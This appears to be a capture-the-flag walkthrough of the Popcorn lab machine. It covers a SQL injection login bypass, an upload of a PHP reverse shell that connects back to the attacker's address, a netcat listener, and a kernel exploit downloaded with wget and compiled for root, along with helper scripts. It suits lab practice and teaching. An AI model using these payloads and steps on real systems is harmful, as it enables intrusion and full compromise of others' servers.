Release: 15 Mar 2017
Nmap scan to enumerate services (-A already implies -sC, -sV and -O, so the extra flags are redundant but harmless):
$ sudo nmap -sC -Pn -sV -A -O 10.10.10.6 -oN nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-04 13:52 EDT
Nmap scan report for 10.10.10.6
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/4%OT=22%CT=1%CU=35952%PV=Y%DS=2%DC=T%G=Y%TM=5EB056A7
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=CA%GCD=2%ISR=CA%TI=Z%CI=Z%II=I%TS=8)SEQ(SP
OS:=C9%GCD=1%ISR=C9%TI=Z%CI=Z%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54
OS:DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=16A0%W2=16A0%
OS:W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW6%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=1
OS:6A0%S=O%A=S+%F=AS%O=M54DST11NW6%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
OS:=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   273.37 ms 10.10.14.1
2   273.85 ms 10.10.10.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.94 seconds
Let's search for an OpenSSH 5.1p1 Debian 6ubuntu2 exploit in Kali:
$ searchsploit openssh
searchsploit lists no exploit for OpenSSH 5.1p1 Debian 6ubuntu2, so without wasting time, let's check what port 80 has for us.
Open your favourite browser and go to http://10.10.10.6.
The page shows nothing interesting, so let's use our directory brute-forcer:
$ dirb http://10.10.10.6
http://10.10.10.6/torrent seems interesting. It is Torrent Hoster, and my attack surfaces are:
- Upload field
- Login form
I'll test the login for SQL injection first, because I don't want to register.
- Click on Login.
- Enter the username abc' or 'a'='a'-- a and any password.
- Click Login and see if it works. Yes, it absolutely works: the first quote closes the username string, or 'a'='a' makes the WHERE clause true for every row, and -- comments out the rest of the query, password check included. MySQL only treats -- as a comment when whitespace follows it, so the trailing " a" is there to make sure that space survives.
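To see why that username works, here is an added example (not code from the post or from Torrent Hoster): a throwaway sqlite3 model of a login query built by string concatenation, next to the parameterised form that the same payload cannot break out of. The table and credentials are constructed sample data; sqlite3 is used only because it runs without a server, and it treats -- followed by whitespace as a line comment just as MySQL does.

```python
import sqlite3

PAYLOAD = "abc' or 'a'='a'-- a"   # the username typed into the login form above

def make_db():
    """Constructed in-memory users table; sample data, not Torrent Hoster's schema."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return con

def vulnerable_login_query(username, password):
    """The query text a concatenating login handler sends to the database."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))

def login_vulnerable(con, username, password):
    # Attacker-controlled text is parsed as SQL: the quote closes the string,
    # or 'a'='a' is always true, and -- comments out the password check.
    row = con.execute(vulnerable_login_query(username, password)).fetchone()
    return row is not None

def login_safe(con, username, password):
    # Placeholders: the values travel separately from the query text, so the
    # quote and the comment marker in PAYLOAD are just characters to compare.
    row = con.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()
    return row is not None

if __name__ == "__main__":
    con = make_db()
    print(vulnerable_login_query(PAYLOAD, "anything"))
    print("concatenated query lets us in:", login_vulnerable(con, PAYLOAD, "anything"))
    print("parameterised query lets us in:", login_safe(con, PAYLOAD, "anything"))
```

The printed query shows the password clause sitting behind the comment marker, which is the whole trick; the parameterised handler compares the literal string abc' or 'a'='a'-- a against the username column and finds nothing.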
Moving on, click on My Torrents and see what is there: a single entry, Kali Linux, under the filename column.
It seems we can upload screenshots by clicking on Edit this torrent. The application is built in PHP, so we can upload a PHP shell, or write our own exploit to get a reverse shell. I prefer the pentestmonkey.net shells.
You can download php-reverse-shell.php directly from pentestmonkey.net. You can also read there how to use it, or follow the walkthrough below, which is copied from pentestmonkey.net; I hope that does not bother you.
Modify the source
Edit the following lines of php-reverse-shell.php:
$ip = '10.10.14.18';  // Remember to enter your tun0 interface IP here
$port = 8002;         // CHANGE THIS
In order to catch the shell
Start a TCP listener on a host and port that the web server can reach. Use the same port as you specified in the script (8002 in this example):
$ nc -v -n -l -p 8002
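If you script this step rather than editing the file by hand, here is an added example (not from the post or from pentestmonkey) that rewrites the two assignments and reads them back so you can check them against the port your listener is on before uploading. SAMPLE_SRC is a constructed two-line stand-in for the real file.

```python
import ipaddress
import re

# Constructed stand-in for the two assignments in php-reverse-shell.php.
SAMPLE_SRC = ("<?php\n"
              "$ip = '127.0.0.1';  // CHANGE THIS\n"
              "$port = 1234;       // CHANGE THIS\n")

IP_RE = re.compile(r"^\$ip = '([^']*)';", re.M)
PORT_RE = re.compile(r"^\$port = (\d+);", re.M)

def patch_reverse_shell(src, ip, port):
    """Return src with the $ip and $port assignments pointed at your listener."""
    ipaddress.ip_address(ip)              # raises ValueError on a mistyped address
    if not 1 <= port <= 65535:
        raise ValueError("port out of range: %r" % port)
    out, n_ip = IP_RE.subn("$ip = '%s';" % ip, src, count=1)
    out, n_port = PORT_RE.subn("$port = %d;" % port, out, count=1)
    if n_ip != 1 or n_port != 1:
        raise ValueError("could not find the $ip/$port assignments")
    return out

def listener_target(src):
    """Read the values back, to compare with the nc listener before uploading."""
    return IP_RE.search(src).group(1), int(PORT_RE.search(src).group(1))

if __name__ == "__main__":
    patched = patch_reverse_shell(SAMPLE_SRC, "10.10.14.18", 8002)
    print(patched)
    print("shell will connect back to", listener_target(patched))
```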
Upload and run the script
Note: we will use Burp Suite as an interception proxy to bypass any file upload restrictions.
- Click on Edit this torrent.
- Rename your PHP shell to exploit.php.jpg:
$ mv php-reverse-shell.php exploit.php.jpg
- Turn Burp Suite intercept on and, in your browser, click Browse to select your PHP shell.
- Click Submit and edit the captured HTTP request in Burp Suite before it reaches the server.
- Click Forward in Burp Suite and wait for the browser to show the upload-success message.
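What the server actually receives from that upload, and what the edit in Burp can change, as an added example (not code from the post or from Torrent Hoster). build_multipart produces the request body a browser would send; parse_multipart is the server-side view of it. The two checks at the end are illustrative, not the application's real logic: weak_check trusts the client-supplied Content-Type, strict_check allowlists the extension and requires real image magic bytes. The post does not show which fields were edited in Burp; the edited variant here (restoring the .php filename while keeping the image/jpeg Content-Type) is an assumption for illustration, and SHELL is a stand-in for the real shell body.

```python
import re

BOUNDARY = "----WebKitFormBoundaryEXAMPLE"                    # constructed boundary
SHELL = b"<?php /* php-reverse-shell body goes here */ ?>"    # stand-in for the shell

def build_multipart(filename, content_type, data, field="file", boundary=BOUNDARY):
    """Body of a multipart/form-data POST with one file part, as a browser sends it."""
    head = ("--%s\r\n"
            'Content-Disposition: form-data; name="%s"; filename="%s"\r\n'
            "Content-Type: %s\r\n\r\n") % (boundary, field, filename, content_type)
    return head.encode() + data + ("\r\n--%s--\r\n" % boundary).encode()

def parse_multipart(body, boundary=BOUNDARY):
    """Return [(headers, data), ...] per part: what a server-side handler sees."""
    delim = ("--" + boundary).encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):           # closing delimiter
            break
        chunk = chunk[2:]                     # drop the CRLF after the delimiter
        raw_headers, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in raw_headers.decode().split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        if data.endswith(b"\r\n"):            # CRLF before the next delimiter is not content
            data = data[:-2]
        parts.append((headers, data))
    return parts

def filename_of(headers):
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    return m.group(1) if m else None

def weak_check(headers):
    """Illustrative weak check: trusts whatever Content-Type the client chose."""
    return headers.get("content-type", "").startswith("image/")

IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")

def strict_check(headers, data):
    """Illustrative stronger check: allowlisted extension AND real image magic bytes."""
    name = filename_of(headers) or ""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if ext not in (".jpg", ".jpeg", ".png", ".gif"):
        return False
    return any(data.startswith(magic) for magic in IMAGE_MAGIC)

if __name__ == "__main__":
    as_sent = build_multipart("exploit.php.jpg", "image/jpeg", SHELL)
    edited = build_multipart("exploit.php", "image/jpeg", SHELL)   # assumed Burp edit
    for label, body in (("as sent", as_sent), ("edited", edited)):
        headers, data = parse_multipart(body)[0]
        print(label, filename_of(headers), headers["content-type"],
              "weak:", weak_check(headers), "strict:", strict_check(headers, data))
```

Both the filename and the part's Content-Type are attacker-controlled bytes, which is why a check on either one alone is worthless; the strict variant still has to be paired with storing the file under a server-generated name in a directory the web server will not execute PHP from.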
Now wondering what next? Go back to the dirb results: we found an upload endpoint, http://10.10.10.6/torrent/upload/. Check whether it contains our uploaded file. Yes, it does.
You may be eager to click on it, but first make sure your netcat listener is running and listening on port 8002.
Click on the uploaded PHP file and see if we get a shell. Yes, we have a shell, and it looks like this:
It's not an interactive shell, so let's make it interactive (optional):
$ python -c 'import pty; pty.spawn("/bin/bash")'
$ ls -la
$ cd /home && ls
$ cd george
And we have our user flag:
$ cat user.txt
Submit your flag as fast as possible, because we still have to pwn root and time is limited; time is money.
$ cd /root
Changing directory to /root says permission denied, which means we need to escalate privileges.
I won't write out all the jargon I went through while pwning root, so I'm jumping directly to how.
The kernel is Linux version 2.6.31-14-generic-pae. You can check it with:
$ cat /proc/version
Go to https://www.exploit-db.com/exploits/15704 and download the exploit; it matches our kernel version. Read the exploit's header comment for the kernel versions it was written against before you run it: a kernel exploit that misses can crash the box instead of giving you root.
After downloading, rename it if you don't like the original name; I renamed it to exp2.c.
Now we need to transfer the payload to the pwned popcorn machine. On the attacker box, serve the directory where you downloaded the exploit:
$ python -m SimpleHTTPServer 8003
Inside the popcorn machine, run:
$ cd /tmp
Remember that we need to enumerate which directories our user can write to; in this case /tmp is writable, so we download the exploit there:
$ wget http://10.10.14.18:8003/exp2.c
We need to compile the program before running it:
$ gcc exp2.c -o exp3
$ ./exp3
Then cd to /root and read the root flag:
$ cd /root
$ cat root.txt
And there it is :) :) ROOT pwned.
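Pre-flight checks for this step as an added example (not from the post): parse the /proc/version line, compare the release against a version range, find a writable staging directory, and confirm gcc is on the target. It runs on the python the box already has. PROC_VERSION is a constructed line using the release named above (the build details after it are made up), and the (2, 6, 0) to (2, 6, 37) range is a placeholder: take the real range from the exploit's header comment.

```python
import os
import re

# Constructed /proc/version line; only the release string is taken from the post.
PROC_VERSION = ("Linux version 2.6.31-14-generic-pae (buildd@example) "
                "(gcc version 4.4.1 (Ubuntu 4.4.1-4ubuntu9) ) #48-Ubuntu SMP")

def parse_proc_version(text):
    """Return ((major, minor, patch), release) from a /proc/version line."""
    m = re.match(r"Linux version ((\d+)\.(\d+)\.(\d+)\S*)", text)
    if not m:
        raise ValueError("not a /proc/version line")
    return (int(m.group(2)), int(m.group(3)), int(m.group(4))), m.group(1)

def kernel_in_range(version, low, high):
    """Inclusive comparison of (major, minor, patch) tuples."""
    return low <= version <= high

def writable_dirs(candidates):
    """Directories among candidates this user can write to (staging for the exploit)."""
    return [d for d in candidates if os.path.isdir(d) and os.access(d, os.W_OK)]

def have_compiler():
    """Is gcc on PATH? If not, compile on the attacker side for the target's arch/libc."""
    return any(os.access(os.path.join(p, "gcc"), os.X_OK)
               for p in os.environ.get("PATH", "").split(os.pathsep) if p)

if __name__ == "__main__":
    try:
        text = open("/proc/version").read()
    except IOError:
        text = PROC_VERSION
    version, release = parse_proc_version(text)
    print(release, "in placeholder range:", kernel_in_range(version, (2, 6, 0), (2, 6, 37)))
    print("writable staging dirs:", writable_dirs(["/tmp", "/dev/shm", "/var/tmp", os.getcwd()]))
    print("gcc available:", have_compiler())
```

If have_compiler comes back False, compile on the attacker side against a matching 32-bit toolchain and transfer the binary instead of the source; a 2.6.31 PAE kernel is a 32-bit target.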
Note: we have exploited the kernel to get root, but the official way is something else. When I was trying to pwn root the other way, I faced a serious problem which I could not figure out how to solve. Maybe there is some change in the machine itself. You may refer to ippsec's Popcorn walkthrough in case you are eager to learn the other way too.
If you solve the machine the ippsec way after this date, I would be happy to know how. You can reach out to me @r00trwx.